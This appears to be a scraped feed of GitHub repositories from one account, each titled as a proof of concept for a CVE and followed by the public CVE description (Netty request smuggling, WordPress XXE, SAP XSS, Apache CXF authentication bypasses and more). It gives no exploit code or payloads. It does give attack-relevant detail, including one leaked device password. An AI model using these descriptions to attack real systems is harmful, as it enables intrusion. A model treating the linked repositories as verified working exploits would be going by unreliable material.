**PoC for exploiting CVE-2021-21295 : Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.** : [PwnCast/CVE-2021-21295](https://github.com/PwnCast/CVE-2021-21295) create time: 2021-06-18T10:25:20Z

**PoC for exploiting CVE-2021-29447 : Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.** : [PwnCast/CVE-2021-29447](https://github.com/PwnCast/CVE-2021-29447) create time: 2021-06-18T10:25:13Z

**PoC for exploiting CVE-2021-21558 : Dell EMC NetWorker, 18.x, 19.1.x, 19.2.x 19.3.x, 19.4 and 19.4.0.1, contains an Information Disclosure vulnerability. A local administrator of the gstd system may potentially exploit this vulnerability to read LDAP credentials from local logs and use the stolen credentials to make changes to the network domain.** : [PwnCast/CVE-2021-21558](https://github.com/PwnCast/CVE-2021-21558) create time: 2021-06-18T10:24:46Z

**PoC for exploiting CVE-2021-21559 : Dell EMC NetWorker, versions 18.x, 19.1.x, 19.2.x 19.3.x, 19.4, and 19.4.0.1 contain an Improper Certificate Validation vulnerability in the client (NetWorker Management Console) components which uses SSL encrypted connection in order to communicate with the application server. An unauthenticated attacker in the same network collision domain as the NetWorker Management Console client could potentially exploit this vulnerability to perform man-in-the-middle attacks to intercept and tamper the traffic between the client and the application server.** : [PwnCast/CVE-2021-21559](https://github.com/PwnCast/CVE-2021-21559) create time: 2021-06-18T10:24:39Z

**PoC for exploiting CVE-2021-27615 : SAP Manufacturing Execution versions - 15.1, 1.5.2, 15.3, 15.4, does not contain some HTTP security headers in their HTTP response. The lack of these headers in response can be exploited by the attacker to execute Cross-Site Scripting (XSS) attacks.** : [PwnCast/CVE-2021-27615](https://github.com/PwnCast/CVE-2021-27615) create time: 2021-06-18T10:24:33Z

**PoC for exploiting CVE-2021-27621 : Information Disclosure vulnerability in UserAdmin application in SAP NetWeaver Application Server for Java, versions - 7.11,7.20,7.30,7.31,7.40 and 7.50 allows attackers to access restricted information by entering malicious server name.** : [PwnCast/CVE-2021-27621](https://github.com/PwnCast/CVE-2021-27621) create time: 2021-06-18T10:24:26Z

**PoC for exploiting CVE-2021-33664 : SAP NetWeaver Application Server ABAP (Applications based on Web Dynpro ABAP), versions - SAP_UI - 750,752,753,754,755, SAP_BASIS - 702, 731 does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.** : [PwnCast/CVE-2021-33664](https://github.com/PwnCast/CVE-2021-33664) create time: 2021-06-18T10:24:19Z

**PoC for exploiting CVE-2021-33665 : SAP NetWeaver Application Server ABAP (Applications based on SAP GUI for HTML), versions - KRNL64NUC - 7.49, KRNL64UC - 7.49,7.53, KERNEL - 7.49,7.53,7.77,7.81,7.84, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.** : [PwnCast/CVE-2021-33665](https://github.com/PwnCast/CVE-2021-33665) create time: 2021-06-18T10:24:13Z

**PoC for exploiting CVE-2021-27637 : Under certain conditions SAP Enable Now (SAP Workforce Performance Builder - Manager), versions - 1.0, 10 allows an attacker to access information which would otherwise be restricted leading to information disclosure.** : [PwnCast/CVE-2021-27637](https://github.com/PwnCast/CVE-2021-27637) create time: 2021-06-18T10:24:06Z

**PoC for exploiting CVE-2021-29049 : Cross-site scripting (XSS) vulnerability in the Portal Workflow module's edit process page in Liferay DXP 7.0 before fix pack 99, 7.1 before fix pack 23, 7.2 before fix pack 12 and 7.3 before fix pack 1, allows remote attackers to inject arbitrary web script or HTML via the currentURL parameter.** : [PwnCast/CVE-2021-29049](https://github.com/PwnCast/CVE-2021-29049) create time: 2021-06-18T10:23:59Z

**PoC for exploiting CVE-2020-23314 : There is an Assertion 'block_found' failed at js-parser-statm.c:2003 parser_parse_try_statement_end in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23314](https://github.com/PwnCast/CVE-2020-23314) create time: 2021-06-18T10:10:56Z

**PoC for exploiting CVE-2020-26811 : SAP Commerce Cloud (Accelerator Payment Mock), versions - 1808, 1811, 1905, 2005, allows an unauthenticated attacker to submit a crafted request over a network to a particular SAP Commerce module URL which will be processed without further interaction, the crafted request leads to Server Side Request Forgery attack which could lead to retrieval of limited pieces of information about the service with no impact on integrity or availability.** : [PwnCast/CVE-2020-26811](https://github.com/PwnCast/CVE-2020-26811) create time: 2021-06-18T09:58:37Z

**PoC for exploiting CVE-2020-26809 : SAP Commerce Cloud, versions- 1808,1811,1905,2005, allows an attacker to bypass existing authentication and permission checks via the '/medias' endpoint hence gaining access to Secure Media folders. This folder could contain sensitive files that results in disclosure of sensitive information and impact system configuration confidentiality.** : [PwnCast/CVE-2020-26809](https://github.com/PwnCast/CVE-2020-26809) create time: 2021-06-18T09:58:23Z

**PoC for exploiting CVE-2006-4811 : Integer overflow in Qt 3.3 before 3.3.7, 4.1 before 4.1.5, and 4.2 before 4.2.1, as used in the KDE khtml library, kdelibs 3.1.3, and possibly other packages, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted pixmap image.** : [PwnCast/CVE-2006-4811](https://github.com/PwnCast/CVE-2006-4811) create time: 2021-06-18T10:19:28Z

**PoC for exploiting CVE-2021-20081 : Incomplete List of Disallowed Inputs in ManageEngine ServiceDesk Plus before version 11205 allows a remote, authenticated attacker to execute arbitrary commands with SYSTEM privileges.** : [PwnCast/CVE-2021-20081](https://github.com/PwnCast/CVE-2021-20081) create time: 2021-06-18T09:55:58Z

**PoC for exploiting CVE-2009-2700 : src/network/ssl/qsslcertificate.cpp in Nokia Trolltech Qt 4.x does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.** : [PwnCast/CVE-2009-2700](https://github.com/PwnCast/CVE-2009-2700) create time: 2021-06-18T10:19:41Z

**PoC for exploiting CVE-2010-2076 : Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.** : [PwnCast/CVE-2010-2076](https://github.com/PwnCast/CVE-2010-2076) create time: 2021-06-18T10:22:53Z

**PoC for exploiting CVE-2011-1096 : The W3C XML Encryption Standard, as used in the JBoss Web Services (JBossWS) component in JBoss Enterprise Portal Platform before 5.2.2 and other products, when using block ciphers in cipher-block chaining (CBC) mode, allows remote attackers to obtain plaintext data via a chosen-ciphertext attack on SOAP responses, aka "character encoding pattern attack."** : [PwnCast/CVE-2011-1096](https://github.com/PwnCast/CVE-2011-1096) create time: 2021-06-18T10:23:33Z

**PoC for exploiting CVE-2011-2487 : The implementations of PKCS#1 v1.5 key transport mechanism for XMLEncryption in JBossWS and Apache WSS4J before 1.6.5 is susceptible to a Bleichenbacher attack.** : [PwnCast/CVE-2011-2487](https://github.com/PwnCast/CVE-2011-2487) create time: 2021-06-18T10:22:41Z

**PoC for exploiting CVE-2021-21990 : VMware Workspace one UEM console (2102 prior to 21.2.0.8, 2101 prior to 21.1.0.14, 2011 prior to 20.11.0.27, 2010 prior to 20.10.0.16,2008 prior to 20.8.0.28, 2007 prior to 20.7.0.14,2006 prior to 20.6.0.19, 2005 prior to 20.5.0.46, 2004 prior to 20.4.0.21, 2003 prior to 20.3.0.23, 2001 prior to 20.1.0.32, 1912 prior to 19.12.0.24) contain a cross-site scripting vulnerability. VMware Workspace ONE UEM console does not validate incoming requests during device enrollment after leading to rendering of unsanitized input on the user device in response.** : [PwnCast/CVE-2021-21990](https://github.com/PwnCast/CVE-2021-21990) create time: 2021-06-18T10:06:48Z

**PoC for exploiting CVE-2012-0803 : The WS-SP UsernameToken policy in Apache CXF 2.4.5 and 2.5.1 allows remote attackers to bypass authentication by sending an empty UsernameToken as part of a SOAP request.** : [PwnCast/CVE-2012-0803](https://github.com/PwnCast/CVE-2012-0803) create time: 2021-06-18T10:23:07Z

**PoC for exploiting CVE-2012-2378 : Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.** : [PwnCast/CVE-2012-2378](https://github.com/PwnCast/CVE-2012-2378) create time: 2021-06-18T10:23:00Z

**PoC for exploiting CVE-2012-2379 : Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.** : [PwnCast/CVE-2012-2379](https://github.com/PwnCast/CVE-2012-2379) create time: 2021-06-18T10:22:47Z

**PoC for exploiting CVE-2012-3451 : Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.** : [PwnCast/CVE-2012-3451](https://github.com/PwnCast/CVE-2012-3451) create time: 2021-06-18T10:22:00Z

**PoC for exploiting CVE-2012-5633 : The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.** : [PwnCast/CVE-2012-5633](https://github.com/PwnCast/CVE-2012-5633) create time: 2021-06-18T10:21:40Z

**PoC for exploiting CVE-2012-5575 : Apache CXF 2.5.x before 2.5.10, 2.6.x before CXF 2.6.7, and 2.7.x before CXF 2.7.4 does not verify that a specified cryptographic algorithm is allowed by the WS-SecurityPolicy AlgorithmSuite definition before decrypting, which allows remote attackers to force CXF to use weaker cryptographic algorithms than intended and makes it easier to decrypt communications, aka "XML Encryption backwards compatibility attack."** : [PwnCast/CVE-2012-5575](https://github.com/PwnCast/CVE-2012-5575) create time: 2021-06-18T10:21:14Z

**PoC for exploiting CVE-2012-5624 : The XMLHttpRequest object in Qt before 4.8.4 enables http redirection to the file scheme, which allows man-in-the-middle attackers to force the read of arbitrary local files and possibly obtain sensitive information via a file: URL to a QML application.** : [PwnCast/CVE-2012-5624](https://github.com/PwnCast/CVE-2012-5624) create time: 2021-06-18T10:19:21Z

**PoC for exploiting CVE-2012-6093 : The QSslSocket::sslErrors function in Qt before 4.6.5, 4.7.x before 4.7.6, 4.8.x before 4.8.5, when using certain versions of openSSL, uses an "incompatible structure layout" that can read memory from the wrong location, which causes Qt to report an incorrect error when certificate validation fails and might cause users to make unsafe security decisions to accept a certificate.** : [PwnCast/CVE-2012-6093](https://github.com/PwnCast/CVE-2012-6093) create time: 2021-06-18T10:19:15Z

**PoC for exploiting CVE-2013-0239 : Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.** : [PwnCast/CVE-2013-0239](https://github.com/PwnCast/CVE-2013-0239) create time: 2021-06-18T10:23:20Z

**PoC for exploiting CVE-2013-2160 : The streaming XML parser in Apache CXF 2.5.x before 2.5.10, 2.6.x before 2.6.7, and 2.7.x before 2.7.4 allows remote attackers to cause a denial of service (CPU and memory consumption) via crafted XML with a large number of (1) elements, (2) attributes, (3) nested constructs, and possibly other vectors.** : [PwnCast/CVE-2013-2160](https://github.com/PwnCast/CVE-2013-2160) create time: 2021-06-18T10:22:20Z

**PoC for exploiting CVE-2013-4549 : QXmlSimpleReader in Qt before 5.2 allows context-dependent attackers to cause a denial of service (memory consumption) via an XML Entity Expansion (XEE) attack.** : [PwnCast/CVE-2013-4549](https://github.com/PwnCast/CVE-2013-4549) create time: 2021-06-18T10:19:48Z

**PoC for exploiting CVE-2013-0254 : The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before 4.7.6, and other versions including 4.4.0 uses weak permissions (world-readable and world-writable) for shared memory segments, which allows local users to read sensitive information or modify critical program data, as demonstrated by reading a pixmap being sent to an X server.** : [PwnCast/CVE-2013-0254](https://github.com/PwnCast/CVE-2013-0254) create time: 2021-06-18T10:19:08Z

**PoC for exploiting CVE-2014-0034 : The SecurityTokenService (STS) in Apache CXF before 2.6.12 and 2.7.x before 2.7.9 does not properly validate SAML tokens when caching is enabled, which allows remote attackers to gain access via an invalid SAML token.** : [PwnCast/CVE-2014-0034](https://github.com/PwnCast/CVE-2014-0034) create time: 2021-06-18T10:23:27Z

**PoC for exploiting CVE-2014-3584 : The SamlHeaderInHandler in Apache CXF before 2.6.11, 2.7.x before 2.7.8, and 3.0.x before 3.0.1 allows remote attackers to cause a denial of service (infinite loop) via a crafted SAML token in the authorization header of a request to a JAX-RS service.** : [PwnCast/CVE-2014-3584](https://github.com/PwnCast/CVE-2014-3584) create time: 2021-06-18T10:22:14Z

**PoC for exploiting CVE-2014-3623 : Apache WSS4J before 1.6.17 and 2.x before 2.0.2, as used in Apache CXF 2.7.x before 2.7.13 and 3.0.x before 3.0.2, when using TransportBinding, does not properly enforce the SAML SubjectConfirmation method security semantics, which allows remote attackers to conduct spoofing attacks via unspecified vectors.** : [PwnCast/CVE-2014-3623](https://github.com/PwnCast/CVE-2014-3623) create time: 2021-06-18T10:22:08Z

**PoC for exploiting CVE-2014-3566 : The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.** : [PwnCast/CVE-2014-3566](https://github.com/PwnCast/CVE-2014-3566) create time: 2021-06-18T10:21:47Z

**PoC for exploiting CVE-2014-3577 : org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a "CN=" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the "foo,CN=www.apache.org" string in the O field.** : [PwnCast/CVE-2014-3577](https://github.com/PwnCast/CVE-2014-3577) create time: 2021-06-18T10:21:33Z

**PoC for exploiting CVE-2014-0190 : The GIF decoder in QtGui in Qt before 5.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via invalid width and height values in a GIF image.** : [PwnCast/CVE-2014-0190](https://github.com/PwnCast/CVE-2014-0190) create time: 2021-06-18T10:18:35Z

**PoC for exploiting CVE-2015-5253 : The SAML Web SSO module in Apache CXF before 2.7.18, 3.0.x before 3.0.7, and 3.1.x before 3.1.3 allows remote authenticated users to bypass authentication via a crafted SAML response with a valid signed assertion, related to a "wrapping attack."** : [PwnCast/CVE-2015-5253](https://github.com/PwnCast/CVE-2015-5253) create time: 2021-06-18T10:21:53Z

**PoC for exploiting CVE-2015-5175 : Application plugins in Apache CXF Fediz before 1.1.3 and 1.2.x before 1.2.1 allow remote attackers to cause a denial of service.** : [PwnCast/CVE-2015-5175](https://github.com/PwnCast/CVE-2015-5175) create time: 2021-06-18T10:21:27Z

**PoC for exploiting CVE-2015-1858 : Multiple buffer overflows in gui/image/qbmphandler.cpp in the QtBase module in Qt before 4.8.7 and 5.x before 5.4.2 allow remote attackers to cause a denial of service (segmentation fault and crash) and possibly execute arbitrary code via a crafted BMP image.** : [PwnCast/CVE-2015-1858](https://github.com/PwnCast/CVE-2015-1858) create time: 2021-06-18T10:19:35Z

**PoC for exploiting CVE-2015-1857 : The odl-mdsal-apidocs feature in OpenDaylight Helium allow remote attackers to obtain sensitive information by leveraging missing AAA restrictions.** : [PwnCast/CVE-2015-1857](https://github.com/PwnCast/CVE-2015-1857) create time: 2021-06-18T10:18:29Z

**PoC for exploiting CVE-2015-0936 : Ceragon FibeAir IP-10 have a default SSH public key in the authorized_keys file for the mateidu user, which allows remote attackers to obtain SSH access by leveraging knowledge of the private key.** : [PwnCast/CVE-2015-0936](https://github.com/PwnCast/CVE-2015-0936) create time: 2021-06-18T09:56:50Z

**PoC for exploiting CVE-2015-6479 : ACEmanager in Sierra Wireless ALEOS 4.4.2 and earlier on ES440, ES450, GX400, GX440, GX450, and LS300 devices allows remote attackers to read the filteredlogs.txt file, and consequently discover potentially sensitive boot-sequence information, via unspecified vectors.** : [PwnCast/CVE-2015-6479](https://github.com/PwnCast/CVE-2015-6479) create time: 2021-06-18T09:56:43Z

**PoC for exploiting CVE-2016-4464 : The application plugins in Apache CXF Fediz 1.2.x before 1.2.3 and 1.3.x before 1.3.1 do not match SAML AudienceRestriction values against configured audience URIs, which might allow remote attackers to have bypass intended restrictions and have unspecified other impact via a crafted SAML token with a trusted signature.** : [PwnCast/CVE-2016-4464](https://github.com/PwnCast/CVE-2016-4464) create time: 2021-06-18T10:21:21Z

**PoC for exploiting CVE-2016-6812 : The HTTP transport module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 uses FormattedServiceListWriter to provide an HTML page which lists the names and absolute URL addresses of the available service endpoints. The module calculates the base URL using the current HttpServletRequest. The calculated base URL is used by FormattedServiceListWriter to build the service endpoint absolute URLs. If the unexpected matrix parameters have been injected into the request URL then these matrix parameters will find their way back to the client in the services list page which represents an XSS risk to the client.** : [PwnCast/CVE-2016-6812](https://github.com/PwnCast/CVE-2016-6812) create time: 2021-06-18T10:21:01Z

**PoC for exploiting CVE-2016-8739 : The JAX-RS module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 provides a number of Atom JAX-RS MessageBodyReaders. These readers use Apache Abdera Parser which expands XML entities by default which represents a major XXE risk.** : [PwnCast/CVE-2016-8739](https://github.com/PwnCast/CVE-2016-8739) create time: 2021-06-18T10:20:55Z

**PoC for exploiting CVE-2016-8713 : A remote out of bound write / memory corruption vulnerability exists in the PDF parsing functionality of Nitro Pro 10.5.9.9. A specially crafted PDF file can cause a vulnerability resulting in potential memory corruption. An attacker can send the victim a specific PDF file to trigger this vulnerability.** : [PwnCast/CVE-2016-8713](https://github.com/PwnCast/CVE-2016-8713) create time: 2021-06-18T10:18:15Z

**PoC for exploiting CVE-2016-8709 : A remote out of bound write / memory corruption vulnerability exists in the PDF parsing functionality of Nitro Pro 10. A specially crafted PDF file can cause a vulnerability resulting in potential memory corruption. An attacker can send the victim a specific PDF file to trigger this vulnerability.** : [PwnCast/CVE-2016-8709](https://github.com/PwnCast/CVE-2016-8709) create time: 2021-06-18T10:18:08Z

**PoC for exploiting CVE-2016-4570 : The mxmlDelete function in mxml-node.c in mxml 2.9, 2.7, and possibly earlier allows remote attackers to cause a denial of service (stack consumption) via crafted xml file.** : [PwnCast/CVE-2016-4570](https://github.com/PwnCast/CVE-2016-4570) create time: 2021-06-18T10:14:28Z

**PoC for exploiting CVE-2016-4571 : The mxml_write_node function in mxml-file.c in mxml 2.9, 2.7, and possibly earlier allows remote attackers to cause a denial of service (stack consumption) via crafted xml file.** : [PwnCast/CVE-2016-4571](https://github.com/PwnCast/CVE-2016-4571) create time: 2021-06-18T10:06:41Z

**PoC for exploiting CVE-2017-12631 : Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross Style Request Forgery) style vulnerability has been found in the Spring 2, Spring 3 and Spring 4 plugins in versions before 1.4.3 and 1.3.3. The vulnerability can result in a security context that is set up using a malicious client's roles for the given enduser.** : [PwnCast/CVE-2017-12631](https://github.com/PwnCast/CVE-2017-12631) create time: 2021-06-18T10:22:33Z

**PoC for exploiting CVE-2017-12624 : Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".** : [PwnCast/CVE-2017-12624](https://github.com/PwnCast/CVE-2017-12624) create time: 2021-06-18T10:22:27Z

**PoC for exploiting CVE-2017-3156 : The OAuth2 Hawk and JOSE MAC Validation code in Apache CXF prior to 3.0.13 and 3.1.x prior to 3.1.10 is not using a constant time MAC signature comparison algorithm which may be exploited by sophisticated timing attacks.** : [PwnCast/CVE-2017-3156](https://github.com/PwnCast/CVE-2017-3156) create time: 2021-06-18T10:21:08Z

**PoC for exploiting CVE-2017-5653 : JAX-RS XML Security streaming clients in Apache CXF before 3.1.11 and 3.0.13 do not validate that the service response was signed or encrypted, which allows remote attackers to spoof servers.** : [PwnCast/CVE-2017-5653](https://github.com/PwnCast/CVE-2017-5653) create time: 2021-06-18T10:20:42Z

**PoC for exploiting CVE-2017-7661 : Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross Style Request Forgery) style vulnerability has been found in the Spring 2, Spring 3, Jetty 8 and Jetty 9 plugins in Apache CXF Fediz prior to 1.4.0, 1.3.2 and 1.2.4.** : [PwnCast/CVE-2017-7661](https://github.com/PwnCast/CVE-2017-7661) create time: 2021-06-18T10:20:29Z

**PoC for exploiting CVE-2017-5656 : Apache CXF's STSClient before 3.1.11 and 3.0.13 uses a flawed way of caching tokens that are associated with delegation tokens, which means that an attacker could craft a token which would return an identifer corresponding to a cached token for another user.** : [PwnCast/CVE-2017-5656](https://github.com/PwnCast/CVE-2017-5656) create time: 2021-06-18T10:20:22Z

**PoC for exploiting CVE-2017-7662 : Apache CXF Fediz ships with an OpenId Connect (OIDC) service which has a Client Registration Service, which is a simple web application that allows clients to be created, deleted, etc. A CSRF (Cross Style Request Forgery) style vulnerability has been found in this web application in Apache CXF Fediz prior to 1.4.0 and 1.3.2, meaning that a malicious web application could create new clients, or reset secrets, etc, after the admin user has logged on to the client registration service and the session is still active.** : [PwnCast/CVE-2017-7662](https://github.com/PwnCast/CVE-2017-7662) create time: 2021-06-18T10:20:16Z

**PoC for exploiting CVE-2017-7852 : D-Link DCS cameras have a weak/insecure CrossDomain.XML file that allows sites hosting malicious Flash objects to access and/or change the device's settings via a CSRF attack. This is because of the 'allow-access-from domain' child element set to *, thus accepting requests from any domain. If a victim logged into the camera's web console visits a malicious site hosting a malicious Flash file from another Browser tab, the malicious Flash file then can send requests to the victim's DCS series Camera without knowing the credentials. An attacker can host a malicious Flash file that can retrieve Live Feeds or information from the victim's DCS series Camera, add new admin users, or make other changes to the device. Known affected devices are DCS-933L with firmware before 1.13.05, DCS-5030L, DCS-5020L, DCS-2530L, DCS-2630L, DCS-930L, DCS-932L, and DCS-932LB1.** : [PwnCast/CVE-2017-7852](https://github.com/PwnCast/CVE-2017-7852) create time: 2021-06-18T10:02:19Z

**PoC for exploiting CVE-2017-6558 : iball Baton 150M iB-WRA150N v1 00000001 1.2.6 build 110401 Rel.47776n devices are prone to an authentication bypass vulnerability that allows remote attackers to view and modify administrative router settings by reading the HTML source code of the password.cgi file.** : [PwnCast/CVE-2017-6558](https://github.com/PwnCast/CVE-2017-6558) create time: 2021-06-18T10:01:33Z

**PoC for exploiting CVE-2020-20178 : Ethereum 0xe933c0cd9784414d5f278c114904f5a84b396919#code.sol latest version is affected by a denial of service vulnerability in the affected payout function. Once the length of this array is too long, it will result in an exception. Attackers can make attacks by creating a series of account addresses.** : [PwnCast/CVE-2020-20178](https://github.com/PwnCast/CVE-2020-20178) create time: 2021-06-18T10:01:23Z

**PoC for exploiting CVE-2017-12816 : In Kaspersky Internet Security for Android 11.12.4.1622, some of application exports activities have weak permissions, which might be used by a malware application to get unauthorized access to the product functionality by using Android IPC.** : [PwnCast/CVE-2017-12816](https://github.com/PwnCast/CVE-2017-12816) create time: 2021-06-18T09:57:19Z

**PoC for exploiting CVE-2017-12817 : In Kaspersky Internet Security for Android 11.12.4.1622, some of the application trace files were not encrypted.** : [PwnCast/CVE-2017-12817](https://github.com/PwnCast/CVE-2017-12817) create time: 2021-06-18T09:57:13Z

**PoC for exploiting CVE-2017-18640 : The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.** : [PwnCast/CVE-2017-18640](https://github.com/PwnCast/CVE-2017-18640) create time: 2021-06-18T09:53:53Z

**PoC for exploiting CVE-2018-8039 : It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.** : [PwnCast/CVE-2018-8039](https://github.com/PwnCast/CVE-2018-8039) create time: 2021-06-18T10:20:48Z

**PoC for exploiting CVE-2018-8038 : Versions of Apache CXF Fediz prior to 1.4.4 do not fully disable Document Type Declarations (DTDs) when either parsing the Identity Provider response in the application plugins, or in the Identity Provider itself when parsing certain XML-based parameters.** : [PwnCast/CVE-2018-8038](https://github.com/PwnCast/CVE-2018-8038) create time: 2021-06-18T10:20:35Z

**PoC for exploiting CVE-2021-22884 : Node.js before 10.24.0, 12.21.0, 14.16.0, and 15.10.0 is vulnerable to DNS rebinding attacks as the whitelist includes “localhost6”. When “localhost6” is not present in /etc/hosts, it is just an ordinary domain that is resolved via DNS, i.e., over network. If the attacker controls the victim's DNS server or can spoof its responses, the DNS rebinding protection can be bypassed by using the “localhost6” domain. As long as the attacker uses the “localhost6” domain, they can still apply the attack described in CVE-2018-7160.** : [PwnCast/CVE-2021-22884](https://github.com/PwnCast/CVE-2021-22884) create time: 2021-06-18T09:59:48Z

**PoC for exploiting CVE-2018-17178 : An issue was discovered on Neato Botvac Connected 2.2.0 devices. They execute unauthenticated manual drive commands (sent to /bin/webserver on port 8081) if they already have an active session. Commands like forward, back, arc-left, arc-right, pivot-left, and pivot-right are executed even though the web socket replies with { "message" : "invalid authorization header" }. Without an active session, commands are still interpreted, but (except for eco-on and eco-off) have no effect, since without active driving, a driving direction does not change anything.** : [PwnCast/CVE-2018-17178](https://github.com/PwnCast/CVE-2018-17178) create time: 2021-06-18T09:57:33Z

**PoC for exploiting CVE-2018-17177 : An issue was discovered on Neato Botvac Connected 2.2.0 and Botvac 85 1.2.1 devices. Static encryption is used for the copying of so-called "black box" logs (event logs and core dumps) to a USB stick. These logs are RC4-encrypted with a 9-character password of *^JEd4W!I that is obfuscated by hiding it within a custom /bin/rc4_crypt binary.** : [PwnCast/CVE-2018-17177](https://github.com/PwnCast/CVE-2018-17177) create time: 2021-06-18T09:57:09Z

**PoC for exploiting CVE-2018-13031 : DamiCMS v6.0.0 aand 6.1.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.** : [PwnCast/CVE-2018-13031](https://github.com/PwnCast/CVE-2018-13031) create time: 2021-06-18T09:55:25Z

**PoC for exploiting CVE-2018-15352 : An attacker with low privileges can cause denial of service in Kraftway 24F2XG Router firmware version 3.5.30.1118.** : [PwnCast/CVE-2018-15352](https://github.com/PwnCast/CVE-2018-15352) create time: 2021-06-18T09:54:14Z

**PoC for exploiting CVE-2018-15152 : Authentication bypass vulnerability in portal/account/register.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker to access (1) portal/add_edit_event_user.php, (2) portal/find_appt_popup_user.php, (3) portal/get_allergies.php, (4) portal/get_amendments.php, (5) portal/get_lab_results.php, (6) portal/get_medications.php, (7) portal/get_patient_documents.php, (8) portal/get_problems.php, (9) portal/get_profile.php, (10) portal/portal_payment.php, (11) portal/messaging/messages.php, (12) portal/messaging/secure_chat.php, (13) portal/report/pat_ledger.php, (14) portal/report/portal_custom_report.php, or (15) portal/report/portal_patient_report.php without authenticating as a patient.** : [PwnCast/CVE-2018-15152](https://github.com/PwnCast/CVE-2018-15152) create time: 2021-06-18T09:53:46Z

